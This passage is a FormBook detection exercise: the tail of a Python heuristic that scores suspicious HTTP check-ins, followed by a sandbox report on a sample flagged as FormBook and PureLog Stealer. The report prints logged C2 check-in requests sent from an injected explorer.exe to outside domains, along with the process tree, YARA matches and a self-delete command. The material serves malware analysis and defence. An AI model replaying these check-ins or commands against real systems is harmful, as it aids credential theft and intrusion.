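     b"GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1\r\n"
     b"Host: www.shopusuniform.com\r\nConnection: close\r\n\r\n"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe",
     b"GET /search?q=putty+download&hl=en HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n"),
]

# Heuristics are mine, derived from the two requests above; tune before production use.
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # e.g. "/cn26/"
OPAQUE_VALUE = re.compile(r"^[A-Za-z0-9+/=]{32,}$")    # long base64-alphabet blob
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "dllhost.exe", "rundll32.exe"}  # assumed watch list


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, ordered query params and headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = []
    for chunk in query.split("&"):          # by hand: no '+' decoding, order preserved
        if chunk:
            name, _, value = chunk.partition("=")
            params.append((name, value))
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params, "headers": headers}


def score_checkin(process: str, raw: bytes) -> tuple:
    """Score one request; higher means more FormBook-like. Returns (score, reasons)."""
    req = parse_request(raw)
    score, reasons = 0, []
    if req["method"] == "GET" and SHORT_DIR.match(req["path"]):
        score += 1
        reasons.append("short single-directory path")
    if len(req["params"]) == 2:
        (_, first), (_, second) = req["params"]
        if OPAQUE_VALUE.match(first) and len(second) <= 8:
            score += 2
            reasons.append("two params: long opaque blob + short token")
    if req["headers"].get("connection", "").lower() == "close" and "user-agent" not in req["headers"]:
        score += 1
        reasons.append("Connection: close and no User-Agent")
    image = ntpath.basename(process).lower()
    if image in SYSTEM_BINARIES:
        score += 2
        reasons.append(f"HTTP from Windows system binary {image}")
    return score, reasons


def hunt(sessions, threshold: int = 4) -> list:
    """Return the sessions at or above the threshold with host and reasons, for triage."""
    hits = []
    for process, raw in sessions:
        score, reasons = score_checkin(process, raw)
        if score >= threshold:
            host = parse_request(raw)["headers"].get("host", "?")
            hits.append({"host": host, "process": process, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_SESSIONS):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

Feed `hunt` with (process, raw request) pairs from a proxy or EDR that records the originating image; the process signal is the one that survives when the operator changes the URI layout. Note also what a hit does not prove: the `HTTP/1.1 200 OK` that www.shopusuniform.com returns in the next session sets a `parking_session` cookie and an `x-adblock-key`, the markers of a domain-parking page, so that domain served no tasking; with FormBook, a check-in to a name is evidence about the infected host, not by itself evidence that the name is the operator's.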


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49720        199.59.243.226  80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 3, 2024 14:51:07.057745934 CEST  162                OUT        GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1
                                                  Host: www.shopusuniform.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Jul 3, 2024 14:51:07.511368990 CEST  1236               IN         HTTP/1.1 200 OK
                                                  date: Wed, 03 Jul 2024 12:51:07 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1314
                                                  x-request-id: a7dbd7e3-08e1-45a4-9f1a-468ffa22a0f1
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bDF4T2ogfaqYQMyW24dKb1cgsqIAvwCajuS0QdCJb/xA/Zkf3SeormFsNLYBV16iQGpPaXnqpcIolCJo5As21A==
                                                  set-cookie: parking_session=a7dbd7e3-08e1-45a4-9f1a-468ffa22a0f1; expires=Wed, 03 Jul 2024 13:06:07 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 44 46 34 54 32 6f 67 66 61 71 59 51 4d 79 57 32 34 64 4b 62 31 63 67 73 71 49 41 76 77 43 61 6a 75 53 30 51 64 43 4a 62 2f 78 41 2f 5a 6b 66 33 53 65 6f 72 6d 46 73 4e 4c 59 42 56 31 36 69 51 47 70 50 61 58 6e 71 70 63 49 6f 6c 43 4a 6f 35 41 73 32 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bDF4T2ogfaqYQMyW24dKb1cgsqIAvwCajuS0QdCJb/xA/Zkf3SeormFsNLYBV16iQGpPaXnqpcIolCJo5As21A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Jul 3, 2024 14:51:07.511396885 CEST | 767 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdkYmQ3ZTMtMDhlMS00NWE0LTlmMWEtNDY4ZmZhMjJhMGYxIiwicGFnZV90aW1lIjoxNzIwMDExMD


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.5 | 49721 | 14.128.41.165 | 80 | 1028 | C:\Windows\explorer.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 3, 2024 14:51:27.802912951 CEST | 156 | OUT | GET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1
                                                  Host: www.j0mui3.shop
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.5 | 49722 | 34.149.87.45 | 80 | 1028 | C:\Windows\explorer.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 3, 2024 14:52:08.288537979 CEST | 160 | OUT | GET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1
                                                  Host: www.dehamobilya.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:52:08.758635044 CEST | 475 | IN | HTTP/1.1 301 Moved Permanently
                                                  Content-Length: 0
                                                  Location: https://www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb
                                                  Accept-Ranges: bytes
                                                  Date: Wed, 03 Jul 2024 12:52:08 GMT
                                                  X-Served-By: cache-iad-kcgs7200105-IAD
                                                  X-Cache: MISS
                                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=
                                                  Via: 1.1 google
                                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                  Connection: close


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.5 | 49723 | 3.33.130.190 | 80 | 1028 | C:\Windows\explorer.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 3, 2024 14:52:28.804977894 CEST | 158 | OUT | GET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1
                                                  Host: www.happyjumps.co
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:52:29.270483971 CEST | 338 | IN | HTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Wed, 03 Jul 2024 12:52:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 198
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 34 31 30 56 3d 70 62 53 62 6e 31 72 4d 69 71 31 4f 50 54 50 36 49 43 64 6e 76 66 57 70 68 61 68 67 39 2b 33 47 74 35 75 6f 51 77 37 36 68 41 36 64 36 54 31 47 4a 2b 65 4b 67 2b 51 37 58 4f 6e 6a 57 78 6e 6c 6f 6c 35 33 26 4b 72 3d 59 74 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb"}</script></head></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  5 | 192.168.2.5 | 49726 | 3.33.130.190 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 3, 2024 14:53:50.846445084 CEST | 160 | OUT | GET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1
                                                  Host: www.yipicircle.life
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:53:51.307919025 CEST | 338 | IN | HTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Wed, 03 Jul 2024 12:53:51 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 198
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 34 31 30 56 3d 68 4d 36 64 71 74 30 62 4e 52 4a 33 77 6e 71 6f 68 58 45 63 6b 47 2b 72 61 37 42 70 79 43 46 4e 4e 31 79 43 6a 6a 59 43 31 59 45 46 41 6f 68 69 62 45 49 79 66 52 58 68 68 42 33 66 6d 4c 2f 4a 74 47 53 6a 26 4b 72 3d 59 74 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb"}</script></head></html>


                                                  Target ID:0
                                                  Start time:08:49:48
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0xb00000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x10000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x170000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x40000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x620000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff674740000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:08:49:51
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:9
                                                  Start time:08:49:55
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:08:49:55
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:10.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:4.8%
                                                    Total number of Nodes:228
                                                    Total number of Limit Nodes:18
                                                    Execution Graph

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'sq$TJxq$Tesq$eE$pwq$xbvq
                                                    • API String ID: 0-2956496829
                                                    • Opcode ID: 1ea2d0bc0a4bf932b1f21dd852ff158e6dafd2f2aa8328fb1cb1624215508c5e
                                                    • Instruction ID: 8a50dc6a549bfeee86c8e2b952e4e40b0bdc82f16533b8ee0fbf685afdce1c4f
                                                    • Opcode Fuzzy Hash: 1ea2d0bc0a4bf932b1f21dd852ff158e6dafd2f2aa8328fb1cb1624215508c5e
                                                    • Instruction Fuzzy Hash: 75B2C175E00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fa10f6ebf26eb30b200bc23e1e63b6d53e87c8b32ae80479dd88ae26a77f94b
                                                    • Instruction ID: f9ee6d88e5ac75f7b84149e682ea5d1c9d6d6734d0296ee4dfaf82c57ea20fed
                                                    • Opcode Fuzzy Hash: 0fa10f6ebf26eb30b200bc23e1e63b6d53e87c8b32ae80479dd88ae26a77f94b
                                                    • Instruction Fuzzy Hash: 31928374A11218CFDB64EF68CC94B99B7B2BF89300F1091EAD509A7365DB31AE81CF54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0def25a185a75ca8df526d16a6ca11e844d8ca0cd2c75b14fd7788ad8648aa
                                                    • Instruction ID: 0dbdced5797d6d75d3b3c2f693ab2bdb6bae373325c666d4d2838aa2a8f843c3
                                                    • Opcode Fuzzy Hash: 0a0def25a185a75ca8df526d16a6ca11e844d8ca0cd2c75b14fd7788ad8648aa
                                                    • Instruction Fuzzy Hash: 42828474A11218CFDB64EF68CC94B99B7B2BF89301F1091EAD509A7365DB31AE81CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c039934acbc5920d311721993c77d591db86b3410bde1fdea55f9e0b13c1a47
                                                    • Instruction ID: 5d51713934ebce3a635120a633307593bed4e1021b23504aa8b18a888b360da4
                                                    • Opcode Fuzzy Hash: 7c039934acbc5920d311721993c77d591db86b3410bde1fdea55f9e0b13c1a47
                                                    • Instruction Fuzzy Hash: ABE1BE3170032A8FDB25DBB9E464BAEB7F7AF89305F14846DD1469B290CB35E901CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 504f1912907c619fc9efa4319f7a6953e0ddf69b65537b5099f6861296e5fb23
                                                    • Instruction ID: 5c9d9ee5a643f7ecac26d6ec8761f959bc7671bd12aada587229d9b1adaa730c
                                                    • Opcode Fuzzy Hash: 504f1912907c619fc9efa4319f7a6953e0ddf69b65537b5099f6861296e5fb23
                                                    • Instruction Fuzzy Hash: A461C4B5E102198FDF04DFEAD8446AEBBB2FF89300F14D02AE515AB258DB345946CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e8ea5e202338e252f12ad7d2750ca3e391f3d71f53233e250bd5ae8440a7906
                                                    • Instruction ID: 21902125c375d7179a3d33a0ae20dea0232cee8ef3c071f8aa549849b4c02ad4
